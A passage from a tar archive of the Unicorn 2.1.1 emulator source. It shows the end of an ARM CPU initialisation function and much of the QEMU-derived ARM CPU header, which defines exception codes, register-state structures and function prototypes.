UC_MODE_ARM1176) { uc->cpu_model = UC_CPU_ARM_1176; } else if (uc->cpu_model == INT_MAX) { if (uc->mode & UC_MODE_BIG_ENDIAN) { uc->cpu_model = UC_CPU_ARM_1176; // For BE32 mode. } else { uc->cpu_model = UC_CPU_ARM_CORTEX_A15; // cortex-a15 } } else if (uc->cpu_model >= ARR_SIZE(arm_cpus)) { free(cpu); return NULL; } #endif cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init ARMCPUClass */ arm_cpu_class_init(uc, cc); /* init CPUState */ cpu_common_initfn(uc, cs); /* init ARMCPU */ arm_cpu_initfn(uc, cs); #if !defined(TARGET_AARCH64) /* init ARM types */ if (arm_cpus[uc->cpu_model].class_init) { arm_cpus[uc->cpu_model].class_init(uc, cc, uc); } if (arm_cpus[uc->cpu_model].initfn) { arm_cpus[uc->cpu_model].initfn(uc, cs); } #endif /* postinit ARMCPU */ arm_cpu_instance_init(cs); /* realize ARMCPU */ arm_cpu_realizefn(uc, cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); // UC_MODE_BIG_ENDIAN means big endian code and big endian data (BE32), which // is only supported before ARMv7-A (and it only makes sense in qemu usermode!). // // UC_MODE_ARMBE8 & BE32 difference shouldn't exist in fact. We do this for // backward compatibility. // // UC_MODE_ARMBE8 -> little endian code, big endian data // UC_MODE_ARMBE8 | UC_MODE_BIG_ENDIAN -> big endian code, big endian data // // In QEMU system, all arm instruction fetch **should be** little endian, however // we hack it to support (usermode) BE32. // // Reference: // https://developer.arm.com/documentation/ddi0406/c/Application-Level-Architecture/Application-Level-Memory-Model/Endian-support/Instruction-endianness?lang=en // https://developer.arm.com/documentation/den0024/a/ARMv8-Registers/Endianness env = &cpu->env; if (uc->mode & UC_MODE_ARMBE8 || uc->mode & UC_MODE_BIG_ENDIAN) { // Big endian data access. env->uncached_cpsr |= CPSR_E; } if (uc->mode & UC_MODE_BIG_ENDIAN) { // Big endian code access. env->cp15.sctlr_ns |= SCTLR_B; } // Backward compatiblity, start arm CPU in non-secure state. env->cp15.scr_el3 |= SCR_NS; arm_rebuild_hflags(env); return cpu; } �����������������������������������������unicorn-2.1.1/qemu/target/arm/cpu.h�����������������������������������������������������������������0000664�0000000�0000000�00000404106�14675241067�0017165�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM virtual CPU header * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef ARM_CPU_H #define ARM_CPU_H #include "hw/registerfields.h" #include "cpu-qom.h" #include "exec/cpu-defs.h" struct uc_struct; /* ARM processors have a weak memory model */ #define TCG_GUEST_DEFAULT_MO (0) #define EXCP_UDEF 1 /* undefined instruction */ #define EXCP_SWI 2 /* software interrupt */ #define EXCP_PREFETCH_ABORT 3 #define EXCP_DATA_ABORT 4 #define EXCP_IRQ 5 #define EXCP_FIQ 6 #define EXCP_BKPT 7 #define EXCP_EXCEPTION_EXIT 8 /* Return from v7M exception. */ #define EXCP_KERNEL_TRAP 9 /* Jumped to kernel code page. */ #define EXCP_HVC 11 /* HyperVisor Call */ #define EXCP_HYP_TRAP 12 #define EXCP_SMC 13 /* Secure Monitor Call */ #define EXCP_VIRQ 14 #define EXCP_VFIQ 15 #define EXCP_SEMIHOST 16 /* semihosting call */ #define EXCP_NOCP 17 /* v7M NOCP UsageFault */ #define EXCP_INVSTATE 18 /* v7M INVSTATE UsageFault */ #define EXCP_STKOF 19 /* v8M STKOF UsageFault */ #define EXCP_LAZYFP 20 /* v7M fault during lazy FP stacking */ #define EXCP_LSERR 21 /* v8M LSERR SecureFault */ #define EXCP_UNALIGNED 22 /* v7M UNALIGNED UsageFault */ /* NB: add new EXCP_ defines to the array in arm_log_exception() too */ #define ARMV7M_EXCP_RESET 1 #define ARMV7M_EXCP_NMI 2 #define ARMV7M_EXCP_HARD 3 #define ARMV7M_EXCP_MEM 4 #define ARMV7M_EXCP_BUS 5 #define ARMV7M_EXCP_USAGE 6 #define ARMV7M_EXCP_SECURE 7 #define ARMV7M_EXCP_SVC 11 #define ARMV7M_EXCP_DEBUG 12 #define ARMV7M_EXCP_PENDSV 14 #define ARMV7M_EXCP_SYSTICK 15 /* For M profile, some registers are banked secure vs non-secure; * these are represented as a 2-element array where the first element * is the non-secure copy and the second is the secure copy. * When the CPU does not have implement the security extension then * only the first element is used. * This means that the copy for the current security state can be * accessed via env->registerfield[env->v7m.secure] (whether the security * extension is implemented or not). */ enum { M_REG_NS = 0, M_REG_S = 1, M_REG_NUM_BANKS = 2, }; /* ARM-specific interrupt pending bits. */ #define CPU_INTERRUPT_FIQ CPU_INTERRUPT_TGT_EXT_1 #define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_EXT_2 #define CPU_INTERRUPT_VFIQ CPU_INTERRUPT_TGT_EXT_3 /* The usual mapping for an AArch64 system register to its AArch32 * counterpart is for the 32 bit world to have access to the lower * half only (with writes leaving the upper half untouched). It's * therefore useful to be able to pass TCG the offset of the least * significant half of a uint64_t struct member. */ #ifdef HOST_WORDS_BIGENDIAN #define offsetoflow32(S, M) (offsetof(S, M) + sizeof(uint32_t)) #define offsetofhigh32(S, M) offsetof(S, M) #else #define offsetoflow32(S, M) offsetof(S, M) #define offsetofhigh32(S, M) (offsetof(S, M) + sizeof(uint32_t)) #endif /* Meanings of the ARMCPU object's four inbound GPIO lines */ #define ARM_CPU_IRQ 0 #define ARM_CPU_FIQ 1 #define ARM_CPU_VIRQ 2 #define ARM_CPU_VFIQ 3 /* ARM-specific extra insn start words: * 1: Conditional execution bits * 2: Partial exception syndrome for data aborts */ #define TARGET_INSN_START_EXTRA_WORDS 2 /* The 2nd extra word holding syndrome info for data aborts does not use * the upper 6 bits nor the lower 14 bits. We mask and shift it down to * help the sleb128 encoder do a better job. * When restoring the CPU state, we shift it back up. */ #define ARM_INSN_START_WORD2_MASK ((1 << 26) - 1) #define ARM_INSN_START_WORD2_SHIFT 14 /* We currently assume float and double are IEEE single and double precision respectively. Doing runtime conversions is tricky because VFP registers may contain integer values (eg. as the result of a FTOSI instruction). s<2n> maps to the least significant half of d<n> s<2n+1> maps to the most significant half of d<n> */ /* CPU state for each instance of a generic timer (in cp15 c14) */ typedef struct ARMGenericTimer { uint64_t cval; /* Timer CompareValue register */ uint64_t ctl; /* Timer Control register */ } ARMGenericTimer; #define GTIMER_PHYS 0 #define GTIMER_VIRT 1 #define GTIMER_HYP 2 #define GTIMER_SEC 3 #define GTIMER_HYPVIRT 4 #define NUM_GTIMERS 5 typedef struct { uint64_t raw_tcr; uint32_t mask; uint32_t base_mask; } TCR; /* Define a maximum sized vector register. * For 32-bit, this is a 128-bit NEON/AdvSIMD register. * For 64-bit, this is a 2048-bit SVE register. * * Note that the mapping between S, D, and Q views of the register bank * differs between AArch64 and AArch32. * In AArch32: * Qn = regs[n].d[1]:regs[n].d[0] * Dn = regs[n / 2].d[n & 1] * Sn = regs[n / 4].d[n % 4 / 2], * bits 31..0 for even n, and bits 63..32 for odd n * (and regs[16] to regs[31] are inaccessible) * In AArch64: * Zn = regs[n].d[*] * Qn = regs[n].d[1]:regs[n].d[0] * Dn = regs[n].d[0] * Sn = regs[n].d[0] bits 31..0 * Hn = regs[n].d[0] bits 15..0 * * This corresponds to the architecturally defined mapping between * the two execution states, and means we do not need to explicitly * map these registers when changing states. * * Align the data for use with TCG host vector operations. */ #ifdef TARGET_AARCH64 # define ARM_MAX_VQ 16 //void arm_cpu_sve_finalize(ARMCPU *cpu); #else # define ARM_MAX_VQ 1 //static inline void arm_cpu_sve_finalize(ARMCPU *cpu) { } #endif typedef struct ARMVectorReg { uint64_t d[2 * ARM_MAX_VQ] QEMU_ALIGNED(16); } ARMVectorReg; #ifdef TARGET_AARCH64 /* In AArch32 mode, predicate registers do not exist at all. */ typedef struct ARMPredicateReg { uint64_t p[DIV_ROUND_UP(2 * ARM_MAX_VQ, 8)] QEMU_ALIGNED(16); } ARMPredicateReg; /* In AArch32 mode, PAC keys do not exist at all. */ typedef struct ARMPACKey { uint64_t lo, hi; } ARMPACKey; #endif typedef struct CPUARMState { /* Regs for current mode. */ uint32_t regs[16]; /* 32/64 switch only happens when taking and returning from * exceptions so the overlap semantics are taken care of then * instead of having a complicated union. */ /* Regs for A64 mode. */ uint64_t xregs[32]; uint64_t pc; /* PSTATE isn't an architectural register for ARMv8. However, it is * convenient for us to assemble the underlying state into a 32 bit format * identical to the architectural format used for the SPSR. (This is also * what the Linux kernel's 'pstate' field in signal handlers and KVM's * 'pstate' register are.) Of the PSTATE bits: * NZCV are kept in the split out env->CF/VF/NF/ZF, (which have the same * semantics as for AArch32, as described in the comments on each field) * nRW (also known as M[4]) is kept, inverted, in env->aarch64 * DAIF (exception masks) are kept in env->daif * BTYPE is kept in env->btype * all other bits are stored in their correct places in env->pstate */ uint32_t pstate; uint32_t aarch64; /* 1 if CPU is in aarch64 state; inverse of PSTATE.nRW */ /* Cached TBFLAGS state. See below for which bits are included. */ uint32_t hflags; /* Frequently accessed CPSR bits are stored separately for efficiency. This contains all the other bits. Use cpsr_{read,write} to access the whole CPSR. */ uint32_t uncached_cpsr; uint32_t spsr; /* Banked registers. */ uint64_t banked_spsr[8]; uint32_t banked_r13[8]; uint32_t banked_r14[8]; /* These hold r8-r12. */ uint32_t usr_regs[5]; uint32_t fiq_regs[5]; /* cpsr flag cache for faster execution */ uint32_t CF; /* 0 or 1 */ uint32_t VF; /* V is the bit 31. All other bits are undefined */ uint32_t NF; /* N is bit 31. All other bits are undefined. */ uint32_t ZF; /* Z set if zero. */ uint32_t QF; /* 0 or 1 */ uint32_t GE; /* cpsr[19:16] */ uint32_t thumb; /* cpsr[5]. 0 = arm mode, 1 = thumb mode. */ uint32_t condexec_bits; /* IT bits. cpsr[15:10,26:25]. */ uint32_t btype; /* BTI branch type. spsr[11:10]. */ uint64_t daif; /* exception masks, in the bits they are in PSTATE */ uint64_t elr_el[4]; /* AArch64 exception link regs */ uint64_t sp_el[4]; /* AArch64 banked stack pointers */ /* System control coprocessor (cp15) */ struct { uint32_t c0_cpuid; union { /* Cache size selection */ struct { uint64_t _unused_csselr0; uint64_t csselr_ns; uint64_t _unused_csselr1; uint64_t csselr_s; }; uint64_t csselr_el[4]; }; union { /* System control register. */ struct { uint64_t _unused_sctlr; uint64_t sctlr_ns; uint64_t hsctlr; uint64_t sctlr_s; }; uint64_t sctlr_el[4]; }; uint64_t cpacr_el1; /* Architectural feature access control register */ uint64_t cptr_el[4]; /* ARMv8 feature trap registers */ uint32_t c1_xscaleauxcr; /* XScale auxiliary control register. */ uint64_t sder; /* Secure debug enable register. */ uint32_t nsacr; /* Non-secure access control register. */ union { /* MMU translation table base 0. */ struct { uint64_t _unused_ttbr0_0; uint64_t ttbr0_ns; uint64_t _unused_ttbr0_1; uint64_t ttbr0_s; }; uint64_t ttbr0_el[4]; }; union { /* MMU translation table base 1. */ struct { uint64_t _unused_ttbr1_0; uint64_t ttbr1_ns; uint64_t _unused_ttbr1_1; uint64_t ttbr1_s; }; uint64_t ttbr1_el[4]; }; uint64_t vttbr_el2; /* Virtualization Translation Table Base. */ /* MMU translation table base control. */ TCR tcr_el[4]; TCR vtcr_el2; /* Virtualization Translation Control. */ uint32_t c2_data; /* MPU data cacheable bits. */ uint32_t c2_insn; /* MPU instruction cacheable bits. */ union { /* MMU domain access control register * MPU write buffer control. */ struct { uint64_t dacr_ns; uint64_t dacr_s; }; struct { uint64_t dacr32_el2; }; }; uint32_t pmsav5_data_ap; /* PMSAv5 MPU data access permissions */ uint32_t pmsav5_insn_ap; /* PMSAv5 MPU insn access permissions */ uint64_t hcr_el2; /* Hypervisor configuration register */ uint64_t scr_el3; /* Secure configuration register. */ union { /* Fault status registers. */ struct { uint64_t ifsr_ns; uint64_t ifsr_s; }; struct { uint64_t ifsr32_el2; }; }; union { struct { uint64_t _unused_dfsr; uint64_t dfsr_ns; uint64_t hsr; uint64_t dfsr_s; }; uint64_t esr_el[4]; }; uint32_t c6_region[8]; /* MPU base/size registers. */ union { /* Fault address registers. */ struct { uint64_t _unused_far0; #ifdef HOST_WORDS_BIGENDIAN uint32_t ifar_ns; uint32_t dfar_ns; uint32_t ifar_s; uint32_t dfar_s; #else uint32_t dfar_ns; uint32_t ifar_ns; uint32_t dfar_s; uint32_t ifar_s; #endif uint64_t _unused_far3; }; uint64_t far_el[4]; }; uint64_t hpfar_el2; uint64_t hstr_el2; union { /* Translation result. */ struct { uint64_t _unused_par_0; uint64_t par_ns; uint64_t _unused_par_1; uint64_t par_s; }; uint64_t par_el[4]; }; uint32_t c9_insn; /* Cache lockdown registers. */ uint32_t c9_data; uint64_t c9_pmcr; /* performance monitor control register */ uint64_t c9_pmcnten; /* perf monitor counter enables */ uint64_t c9_pmovsr; /* perf monitor overflow status */ uint64_t c9_pmuserenr; /* perf monitor user enable */ uint64_t c9_pmselr; /* perf monitor counter selection register */ uint64_t c9_pminten; /* perf monitor interrupt enables */ union { /* Memory attribute redirection */ struct { #ifdef HOST_WORDS_BIGENDIAN uint64_t _unused_mair_0; uint32_t mair1_ns; uint32_t mair0_ns; uint64_t _unused_mair_1; uint32_t mair1_s; uint32_t mair0_s; #else uint64_t _unused_mair_0; uint32_t mair0_ns; uint32_t mair1_ns; uint64_t _unused_mair_1; uint32_t mair0_s; uint32_t mair1_s; #endif }; uint64_t mair_el[4]; }; union { /* vector base address register */ struct { uint64_t _unused_vbar; uint64_t vbar_ns; uint64_t hvbar; uint64_t vbar_s; }; uint64_t vbar_el[4]; }; uint32_t mvbar; /* (monitor) vector base address register */ struct { /* FCSE PID. */ uint32_t fcseidr_ns; uint32_t fcseidr_s; }; union { /* Context ID. */ struct { uint64_t _unused_contextidr_0; uint64_t contextidr_ns; uint64_t _unused_contextidr_1; uint64_t contextidr_s; }; uint64_t contextidr_el[4]; }; union { /* User RW Thread register. */ struct { uint64_t tpidrurw_ns; uint64_t tpidrprw_ns; uint64_t htpidr; uint64_t _tpidr_el3; }; uint64_t tpidr_el[4]; }; /* The secure banks of these registers don't map anywhere */ uint64_t tpidrurw_s; uint64_t tpidrprw_s; uint64_t tpidruro_s; union { /* User RO Thread register. */ uint64_t tpidruro_ns; uint64_t tpidrro_el[1]; }; uint64_t c14_cntfrq; /* Counter Frequency register */ uint64_t c14_cntkctl; /* Timer Control register */ uint32_t cnthctl_el2; /* Counter/Timer Hyp Control register */ uint64_t cntvoff_el2; /* Counter Virtual Offset register */ ARMGenericTimer c14_timer[NUM_GTIMERS]; uint32_t c15_cpar; /* XScale Coprocessor Access Register */ uint32_t c15_ticonfig; /* TI925T configuration byte. */ uint32_t c15_i_max; /* Maximum D-cache dirty line index. */ uint32_t c15_i_min; /* Minimum D-cache dirty line index. */ uint32_t c15_threadid; /* TI debugger thread-ID. */ uint32_t c15_config_base_address; /* SCU base address. */ uint32_t c15_diagnostic; /* diagnostic register */ uint32_t c15_power_diagnostic; uint32_t c15_power_control; /* power control */ uint64_t dbgbvr[16]; /* breakpoint value registers */ uint64_t dbgbcr[16]; /* breakpoint control registers */ uint64_t dbgwvr[16]; /* watchpoint value registers */ uint64_t dbgwcr[16]; /* watchpoint control registers */ uint64_t mdscr_el1; uint64_t oslsr_el1; /* OS Lock Status */ uint64_t mdcr_el2; uint64_t mdcr_el3; /* Stores the architectural value of the counter *the last time it was * updated* by pmccntr_op_start. Accesses should always be surrounded * by pmccntr_op_start/pmccntr_op_finish to guarantee the latest * architecturally-correct value is being read/set. */ uint64_t c15_ccnt; /* Stores the delta between the architectural value and the underlying * cycle count during normal operation. It is used to update c15_ccnt * to be the correct architectural value before accesses. During * accesses, c15_ccnt_delta contains the underlying count being used * for the access, after which it reverts to the delta value in * pmccntr_op_finish. */ uint64_t c15_ccnt_delta; uint64_t c14_pmevcntr[31]; uint64_t c14_pmevcntr_delta[31]; uint64_t c14_pmevtyper[31]; uint64_t pmccfiltr_el0; /* Performance Monitor Filter Register */ uint64_t vpidr_el2; /* Virtualization Processor ID Register */ uint64_t vmpidr_el2; /* Virtualization Multiprocessor ID Register */ } cp15; struct { /* M profile has up to 4 stack pointers: * a Main Stack Pointer and a Process Stack Pointer for each * of the Secure and Non-Secure states. (If the CPU doesn't support * the security extension then it has only two SPs.) * In QEMU we always store the currently active SP in regs[13], * and the non-active SP for the current security state in * v7m.other_sp. The stack pointers for the inactive security state * are stored in other_ss_msp and other_ss_psp. * switch_v7m_security_state() is responsible for rearranging them * when we change security state. */ uint32_t other_sp; uint32_t other_ss_msp; uint32_t other_ss_psp; uint32_t vecbase[M_REG_NUM_BANKS]; uint32_t basepri[M_REG_NUM_BANKS]; uint32_t control[M_REG_NUM_BANKS]; uint32_t ccr[M_REG_NUM_BANKS]; /* Configuration and Control */ uint32_t cfsr[M_REG_NUM_BANKS]; /* Configurable Fault Status */ uint32_t hfsr; /* HardFault Status */ uint32_t dfsr; /* Debug Fault Status Register */ uint32_t sfsr; /* Secure Fault Status Register */ uint32_t mmfar[M_REG_NUM_BANKS]; /* MemManage Fault Address */ uint32_t bfar; /* BusFault Address */ uint32_t sfar; /* Secure Fault Address Register */ unsigned mpu_ctrl[M_REG_NUM_BANKS]; /* MPU_CTRL */ int exception; uint32_t primask[M_REG_NUM_BANKS]; uint32_t faultmask[M_REG_NUM_BANKS]; uint32_t aircr; /* only holds r/w state if security extn implemented */ uint32_t secure; /* Is CPU in Secure state? (not guest visible) */ uint32_t csselr[M_REG_NUM_BANKS]; uint32_t scr[M_REG_NUM_BANKS]; uint32_t msplim[M_REG_NUM_BANKS]; uint32_t psplim[M_REG_NUM_BANKS]; uint32_t fpcar[M_REG_NUM_BANKS]; uint32_t fpccr[M_REG_NUM_BANKS]; uint32_t fpdscr[M_REG_NUM_BANKS]; uint32_t cpacr[M_REG_NUM_BANKS]; uint32_t nsacr; } v7m; /* Information associated with an exception about to be taken: * code which raises an exception must set cs->exception_index and * the relevant parts of this structure; the cpu_do_interrupt function * will then set the guest-visible registers as part of the exception * entry process. */ struct { uint32_t syndrome; /* AArch64 format syndrome register */ uint32_t fsr; /* AArch32 format fault status register info */ uint64_t vaddress; /* virtual addr associated with exception, if any */ uint32_t target_el; /* EL the exception should be targeted for */ /* If we implement EL2 we will also need to store information * about the intermediate physical address for stage 2 faults. */ } exception; /* Information associated with an SError */ struct { uint8_t pending; uint8_t has_esr; uint64_t esr; } serror; /* State of our input IRQ/FIQ/VIRQ/VFIQ lines */ uint32_t irq_line_state; /* Thumb-2 EE state. */ uint32_t teecr; uint32_t teehbr; /* VFP coprocessor state. */ struct { ARMVectorReg zregs[32]; #ifdef TARGET_AARCH64 /* Store FFR as pregs[16] to make it easier to treat as any other. */ #define FFR_PRED_NUM 16 ARMPredicateReg pregs[17]; /* Scratch space for aa64 sve predicate temporary. */ ARMPredicateReg preg_tmp; #endif /* We store these fpcsr fields separately for convenience. */ uint32_t qc[4] QEMU_ALIGNED(16); int vec_len; int vec_stride; uint32_t xregs[16]; /* Scratch space for aa32 neon expansion. */ uint32_t scratch[8]; /* There are a number of distinct float control structures: * * fp_status: is the "normal" fp status. * fp_status_fp16: used for half-precision calculations * standard_fp_status : the ARM "Standard FPSCR Value" * * Half-precision operations are governed by a separate * flush-to-zero control bit in FPSCR:FZ16. We pass a separate * status structure to control this. * * The "Standard FPSCR", ie default-NaN, flush-to-zero, * round-to-nearest and is used by any operations (generally * Neon) which the architecture defines as controlled by the * standard FPSCR value rather than the FPSCR. * * To avoid having to transfer exception bits around, we simply * say that the FPSCR cumulative exception flags are the logical * OR of the flags in the three fp statuses. This relies on the * only thing which needs to read the exception flags being * an explicit FPSCR read. */ float_status fp_status; float_status fp_status_f16; float_status standard_fp_status; /* ZCR_EL[1-3] */ uint64_t zcr_el[4]; } vfp; uint64_t exclusive_addr; uint64_t exclusive_val; uint64_t exclusive_high; /* iwMMXt coprocessor state. */ struct { uint64_t regs[16]; uint64_t val; uint32_t cregs[16]; } iwmmxt; #ifdef TARGET_AARCH64 struct { ARMPACKey apia; ARMPACKey apib; ARMPACKey apda; ARMPACKey apdb; ARMPACKey apga; } keys; #endif /* Fields up to this point are cleared by a CPU reset */ #ifndef _MSC_VER struct {} end_reset_fields; #else int end_reset_fields; #endif /* Fields after this point are preserved across CPU reset. */ /* Internal CPU feature flags. */ uint64_t features; /* PMSAv7 MPU */ struct { uint32_t *drbar; uint32_t *drsr; uint32_t *dracr; uint32_t rnr[M_REG_NUM_BANKS]; } pmsav7; /* PMSAv8 MPU */ struct { /* The PMSAv8 implementation also shares some PMSAv7 config * and state: * pmsav7.rnr (region number register) * pmsav7_dregion (number of configured regions) */ uint32_t *rbar[M_REG_NUM_BANKS]; uint32_t *rlar[M_REG_NUM_BANKS]; uint32_t mair0[M_REG_NUM_BANKS]; uint32_t mair1[M_REG_NUM_BANKS]; } pmsav8; /* v8M SAU */ struct { uint32_t *rbar; uint32_t *rlar; uint32_t rnr; uint32_t ctrl; } sau; void *nvic; const struct arm_boot_info *boot_info; /* Store GICv3CPUState to access from this struct */ void *gicv3state; struct CPUBreakpoint *cpu_breakpoint[16]; struct CPUWatchpoint *cpu_watchpoint[16]; // Unicorn engine struct uc_struct *uc; } CPUARMState; /** * ARMELChangeHookFn: * type of a function which can be registered via arm_register_el_change_hook() * to get callbacks when the CPU changes its exception level or mode. */ typedef void ARMELChangeHookFn(ARMCPU *cpu, void *opaque); typedef struct ARMELChangeHook ARMELChangeHook; struct ARMELChangeHook { ARMELChangeHookFn *hook; void *opaque; QLIST_ENTRY(ARMELChangeHook) node; }; /* These values map onto the return values for * QEMU_PSCI_0_2_FN_AFFINITY_INFO */ typedef enum ARMPSCIState { PSCI_ON = 0, PSCI_OFF = 1, PSCI_ON_PENDING = 2 } ARMPSCIState; typedef struct ARMISARegisters ARMISARegisters; /** * ARMCPU: * @env: #CPUARMState * * An ARM CPU core. */ struct ARMCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUARMState env; /* Coprocessor information */ GHashTable *cp_regs; /* For marshalling (mostly coprocessor) register state between the * kernel and QEMU (for KVM) and between two QEMUs (for migration), * we use these arrays. */ /* List of register indexes managed via these arrays; (full KVM style * 64 bit indexes, not CPRegInfo 32 bit indexes) */ uint64_t *cpreg_indexes; /* Values of the registers (cpreg_indexes[i]'s value is cpreg_values[i]) */ uint64_t *cpreg_values; /* Length of the indexes, values, reset_values arrays */ int32_t cpreg_array_len; /* These are used only for migration: incoming data arrives in * these fields and is sanity checked in post_load before copying * to the working data structures above. */ uint64_t *cpreg_vmstate_indexes; uint64_t *cpreg_vmstate_values; int32_t cpreg_vmstate_array_len; /* Timers used by the generic (architected) timer */ // QEMUTimer *gt_timer[NUM_GTIMERS]; /* * Timer used by the PMU. Its state is restored after migration by * pmu_op_finish() - it does not need other handling during migration */ // QEMUTimer *pmu_timer; /* GPIO outputs for generic timer */ //qemu_irq gt_timer_outputs[NUM_GTIMERS]; /* GPIO output for GICv3 maintenance interrupt signal */ //qemu_irq gicv3_maintenance_interrupt; /* GPIO output for the PMU interrupt */ //qemu_irq pmu_interrupt; /* MemoryRegion to use for secure physical accesses */ MemoryRegion *secure_memory; /* For v8M, pointer to the IDAU interface provided by board/SoC */ void *idau; /* PSCI version for this CPU * Bits[31:16] = Major Version * Bits[15:0] = Minor Version */ uint32_t psci_version; /* Should CPU start in PSCI powered-off state? */ bool start_powered_off; /* Current power state, access guarded by BQL */ ARMPSCIState power_state; /* CPU has virtualization extension */ bool has_el2; /* CPU has security extension */ bool has_el3; /* CPU has PMU (Performance Monitor Unit) */ bool has_pmu; /* CPU has VFP */ bool has_vfp; /* CPU has Neon */ bool has_neon; /* CPU has M-profile DSP extension */ bool has_dsp; /* CPU has memory protection unit */ bool has_mpu; /* PMSAv7 MPU number of supported regions */ uint32_t pmsav7_dregion; /* v8M SAU number of supported regions */ uint32_t sau_sregion; /* PSCI conduit used to invoke PSCI methods * 0 - disabled, 1 - smc, 2 - hvc */ uint32_t psci_conduit; /* For v8M, initial value of the Secure VTOR */ uint32_t init_svtor; /* Uniprocessor system with MP extensions */ bool mp_is_up; /* True if we tried kvm_arm_host_cpu_features() during CPU instance_init * and the probe failed (so we need to report the error in realize) */ bool host_cpu_probe_failed; /* Specify the number of cores in this CPU cluster. Used for the L2CTLR * register. */ int32_t core_count; /* The instance init functions for implementation-specific subclasses * set these fields to specify the implementation-dependent values of * various constant registers and reset values of non-constant * registers. * Some of these might become QOM properties eventually. * Field names match the official register names as defined in the * ARMv7AR ARM Architecture Reference Manual. A reset_ prefix * is used for reset values of non-constant registers; no reset_ * prefix means a constant register. * Some of these registers are split out into a substructure that * is shared with the translators to control the ISA. * * Note that if you add an ID register to the ARMISARegisters struct * you need to also update the 32-bit and 64-bit versions of the * kvm_arm_get_host_cpu_features() function to correctly populate the * field by reading the value from the KVM vCPU. */ struct ARMISARegisters { uint32_t id_isar0; uint32_t id_isar1; uint32_t id_isar2; uint32_t id_isar3; uint32_t id_isar4; uint32_t id_isar5; uint32_t id_isar6; uint32_t id_mmfr0; uint32_t id_mmfr1; uint32_t id_mmfr2; uint32_t id_mmfr3; uint32_t id_mmfr4; uint32_t mvfr0; uint32_t mvfr1; uint32_t mvfr2; uint32_t id_dfr0; uint32_t dbgdidr; uint64_t id_aa64isar0; uint64_t id_aa64isar1; uint64_t id_aa64pfr0; uint64_t id_aa64pfr1; uint64_t id_aa64mmfr0; uint64_t id_aa64mmfr1; uint64_t id_aa64mmfr2; uint64_t id_aa64dfr0; uint64_t id_aa64dfr1; } isar; uint32_t midr; uint32_t revidr; uint32_t reset_fpsid; uint32_t ctr; uint32_t reset_sctlr; uint32_t id_pfr0; uint32_t id_pfr1; uint64_t pmceid0; uint64_t pmceid1; uint32_t id_afr0; uint64_t id_aa64afr0; uint64_t id_aa64afr1; uint32_t clidr; uint64_t mp_affinity; /* MP ID without feature bits */ /* The elements of this array are the CCSIDR values for each cache, * in the order L1DCache, L1ICache, L2DCache, L2ICache, etc. */ uint64_t ccsidr[16]; uint64_t reset_cbar; uint32_t reset_auxcr; bool reset_hivecs; /* DCZ blocksize, in log_2(words), ie low 4 bits of DCZID_EL0 */ uint32_t dcz_blocksize; uint64_t rvbar; /* Configurable aspects of GIC cpu interface (which is part of the CPU) */ int gic_num_lrs; /* number of list registers */ int gic_vpribits; /* number of virtual priority bits */ int gic_vprebits; /* number of virtual preemption bits */ /* Whether the cfgend input is high (i.e. this CPU should reset into * big-endian mode). This setting isn't used directly: instead it modifies * the reset_sctlr value to have SCTLR_B or SCTLR_EE set, depending on the * architecture version. */ bool cfgend; QLIST_HEAD(, ARMELChangeHook) pre_el_change_hooks; QLIST_HEAD(, ARMELChangeHook) el_change_hooks; int32_t node_id; /* NUMA node this CPU belongs to */ /* Used to synchronize KVM and QEMU in-kernel device levels */ uint8_t device_irq_level; /* Used to set the maximum vector length the cpu will support. */ uint32_t sve_max_vq; /* * In sve_vq_map each set bit is a supported vector length of * (bit-number + 1) * 16 bytes, i.e. each bit number + 1 is the vector * length in quadwords. * * While processing properties during initialization, corresponding * sve_vq_init bits are set for bits in sve_vq_map that have been * set by properties. */ DECLARE_BITMAP(sve_vq_map, ARM_MAX_VQ); DECLARE_BITMAP(sve_vq_init, ARM_MAX_VQ); /* Generic timer counter frequency, in Hz */ uint64_t gt_cntfrq_hz; struct ARMCPUClass cc; }; unsigned int gt_cntfrq_period_ns(ARMCPU *cpu); void arm_cpu_do_interrupt(CPUState *cpu); void arm_v7m_cpu_do_interrupt(CPUState *cpu); bool arm_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); /* * Helpers to dynamically generates XML descriptions of the sysregs * and SVE registers. Returns the number of registers in each set. */ int arm_gen_dynamic_sysreg_xml(CPUState *cpu, int base_reg); int arm_gen_dynamic_svereg_xml(CPUState *cpu, int base_reg); #ifdef TARGET_AARCH64 void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq); void aarch64_sve_change_el(CPUARMState *env, int old_el, int new_el, bool el0_a64); void aarch64_add_sve_properties(void *obj); /* * SVE registers are encoded in KVM's memory in an endianness-invariant format. * The byte at offset i from the start of the in-memory representation contains * the bits [(7 + 8 * i) : (8 * i)] of the register value. As this means the * lowest offsets are stored in the lowest memory addresses, then that nearly * matches QEMU's representation, which is to use an array of host-endian * uint64_t's, where the lower offsets are at the lower indices. To complete * the translation we just need to byte swap the uint64_t's on big-endian hosts. */ static inline uint64_t *sve_bswap64(uint64_t *dst, uint64_t *src, int nr) { #ifdef HOST_WORDS_BIGENDIAN int i; for (i = 0; i < nr; ++i) { dst[i] = bswap64(src[i]); } return dst; #else return src; #endif } #else static inline void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq) { } static inline void aarch64_sve_change_el(CPUARMState *env, int o, int n, bool a) { } static inline void aarch64_add_sve_properties(void *obj) { } #endif target_ulong do_arm_semihosting(CPUARMState *env); void aarch64_sync_32_to_64(CPUARMState *env); void aarch64_sync_64_to_32(CPUARMState *env); int 